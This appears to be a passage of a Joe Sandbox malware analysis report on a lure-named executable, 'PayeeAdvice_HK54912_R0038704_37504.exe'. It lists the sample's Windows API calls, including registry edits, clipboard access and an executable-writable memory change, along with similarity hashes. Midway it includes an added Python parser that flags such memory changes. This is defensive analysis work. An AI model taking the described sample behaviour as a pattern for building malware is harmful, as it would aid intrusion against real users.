• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 46721b92d40d640d2f6aadb643be8dc990b493bf81be5550ca0503008034f64e
• Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
• Opcode Fuzzy Hash: 46721b92d40d640d2f6aadb643be8dc990b493bf81be5550ca0503008034f64e
• Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                                                          APIs
                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
• RegCloseKey.ADVAPI32(00000000), ref: 004022FD
Similarity
• API ID: CloseDeleteOpenValue
• String ID:
• API String ID: 849931509-0
APIs
• ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
• EnableWindow.USER32(00000000,00000000), ref: 00401DE8
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
APIs
• GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405B5A
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405736,?,?,00000000,0040590C,?,?,?,?), ref: 00405B36
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B4A
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
                                                                                                                                          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                          • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                                          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                          • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                          • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                          • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                                                          APIs
                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                          • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                          • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
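The records in this section all follow the same layout: an "APIs" line, one bullet per resolved call with its arguments and call-site address, the memory dump the function was lifted from (whose "Offset:" is the image base), and the opcode and instruction fuzzy hashes the plugin uses for similarity lookups. The VirtualProtect record directly above is the one worth pulling out automatically: its third argument, flNewProtect, is 00000040, which is PAGE_EXECUTE_READWRITE, applied to four bytes at 1000405C inside the module mapped at 10000000. The parser below is an added example written for this page, not Joe Security code; the record layout it expects is inferred from the entries printed here, the FunctionRecord and ApiCall types and the rwx_protect_changes check are my own, and the sample input is two records copied from this page with the indentation and "Associated:" lines trimmed.

```python
"""Parse the per-function records of a Joe Sandbox 'IDA Plugin' section
and flag page-protection changes to PAGE_EXECUTE_READWRITE.

Added example for this page (not Joe Security code). The record layout is
inferred from the entries printed on the page; field names are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

PAGE_EXECUTE_READWRITE = 0x40  # flNewProtect in the VirtualProtect record above

# Constructed sample: two records copied from this page, indentation and the
# "Associated:" dump lines removed.
SAMPLE = """APIs
• ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
• Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
• Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
• Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
APIs
• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
• Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
"""


@dataclass
class ApiCall:
    name: str          # e.g. "VirtualProtect"
    module: str        # e.g. "KERNELBASE"
    args: List[str]    # raw hex strings; "?" where the plugin could not resolve a value
    ref: int           # call-site address as printed after "ref:"

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an integer, or None if it is missing or unresolved ('?')."""
        if i >= len(self.args) or self.args[i] == "?":
            return None
        return int(self.args[i], 16)


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    image_base: Optional[int] = None   # "Offset:" of the source dump
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""


API_RE = re.compile(r"^• (\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)$")
BASE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")


def _value(line: str) -> str:
    """Text after the first ':' of a '• Label: value' line."""
    return line.split(":", 1)[1].strip()


def parse_records(text: str) -> List[FunctionRecord]:
    """Start a new record at each 'APIs' header and fill it from the lines that follow."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            arglist = [a.strip() for a in args.split(",")] if args else []
            cur.calls.append(ApiCall(name, module, arglist, int(ref, 16)))
        elif line.startswith("• Source File:"):
            b = BASE_RE.search(line)
            if b:
                cur.image_base = int(b.group(1), 16)
        elif line.startswith("• API String ID:"):
            cur.api_string_id = _value(line)
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = _value(line)
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = _value(line)
    return records


def rwx_protect_changes(records: List[FunctionRecord]) -> List[Tuple[int, int, int]]:
    """(call site, target address, size) for each VirtualProtect(..., PAGE_EXECUTE_READWRITE, ...)."""
    hits = []
    for rec in records:
        for c in rec.calls:
            if c.name == "VirtualProtect" and c.arg_int(2) == PAGE_EXECUTE_READWRITE:
                hits.append((c.ref, c.arg_int(0), c.arg_int(1)))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        for c in rec.calls:
            rva = c.ref - rec.image_base if rec.image_base is not None else c.ref
            print(f"{c.name}.{c.module} at {c.ref:08X} (RVA {rva:X}) "
                  f"instr_fuzzy={rec.instruction_fuzzy_hash}")
    for ref, addr, size in rwx_protect_changes(recs):
        print(f"RWX protection change at {ref:08X}: {size} bytes at {addr:08X}")
```

Subtracting the dump's "Offset:" from each "ref:" gives the RVA, which is what to key on when comparing the same function across reports where the module was mapped at a different base; the Opcode ID and Instruction Fuzzy Hash fields are the values to pivot on when hunting for the same code in other samples.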
                                                                                                                                          APIs
                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1096422788-0
                                                                                                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                                                          APIs
                                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
                                                                                                                                          • Instruction ID: f4c604eae2506afdbcc8ec41f9b2bc8be0b1ceb91ea8510f154d928e9cd5b687
                                                                                                                                          • Opcode Fuzzy Hash: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
                                                                                                                                          • Instruction Fuzzy Hash: A4D012B2B08100D7DB10DFE59A08ADDB7699B10329F304A77D101F21D0D2B885419A2A
                                                                                                                                          APIs
                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                          • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                          • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                                                          • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                          • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                                          APIs
                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
• Instruction ID: ad5cbb4e8c7f0aba0b65fecb58585b4f8dfec95c15ef4476e698ddf4bc3863dd
• Opcode Fuzzy Hash: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
• Instruction Fuzzy Hash: 05D0C77771414097D750DBB86E8585B73ACD7513197204C73D542F1491D178D8018939
APIs
• GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
• Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405332
• GetDlgItem.USER32(?,000003EE), ref: 00405341
• GetClientRect.USER32(?,?), ref: 0040537E
• GetSystemMetrics.USER32(00000015), ref: 00405386
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
• ShowWindow.USER32(?,00000008), ref: 00405422
• GetDlgItem.USER32(?,000003EC), ref: 00405443
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
• GetDlgItem.USER32(?,000003F8), ref: 00405350
  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
• GetDlgItem.USER32(?,000003EC), ref: 00405495
• CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
• CloseHandle.KERNEL32(00000000), ref: 004054AA
• ShowWindow.USER32(00000000), ref: 004054CE
• ShowWindow.USER32(?,00000008), ref: 004054D3
• ShowWindow.USER32(00000008), ref: 0040551D
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
• CreatePopupMenu.USER32 ref: 00405562
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
• GetWindowRect.USER32(?,?), ref: 00405596
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
• OpenClipboard.USER32(00000000), ref: 004055F7
• EmptyClipboard.USER32 ref: 004055FD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
• GlobalLock.KERNEL32(00000000), ref: 00405613
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
• GlobalUnlock.KERNEL32(00000000), ref: 00405647
• SetClipboardData.USER32(0000000D,00000000), ref: 00405652
• CloseClipboard.USER32 ref: 00405658
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
• Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404619
• SetWindowTextW.USER32(00000000,?), ref: 00404643
• SHBrowseForFolderW.SHELL32(?), ref: 004046F4
• CoTaskMemFree.OLE32(00000000), ref: 004046FF
• lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
• lstrcatW.KERNEL32(?,Call), ref: 0040473D
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
